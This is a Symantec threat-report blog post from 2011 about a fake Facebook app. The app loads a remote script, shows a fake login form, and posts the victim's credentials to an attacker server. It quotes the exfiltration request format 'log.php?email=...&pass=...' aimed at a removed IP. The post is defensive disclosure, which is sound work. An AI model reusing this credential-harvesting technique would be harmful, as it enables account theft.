Another Fake Facebook App is Here to Steal your Passwords

Created: 07 Apr 2011 08:45:19 GMT • Updated: 23 Jan 2014 18:21:42 GMT • Translations available: 日本語
Hardik Shah's picture
Login to vote
+1 1 Vote

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:

View Inline Image

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:

View Inline Image

When the user clicks on the “Login” button, it will show the login form:

View Inline Image  
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.

The following are the fiddler logs that show email addresses and passwords being posted to the malicious server:

View Inline Image The bogus app also "likes" the link in an automatic post, which will be displayed on the user's profile:

View Inline Image We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools' prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:

 

View Inline Image

The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.

Filed Under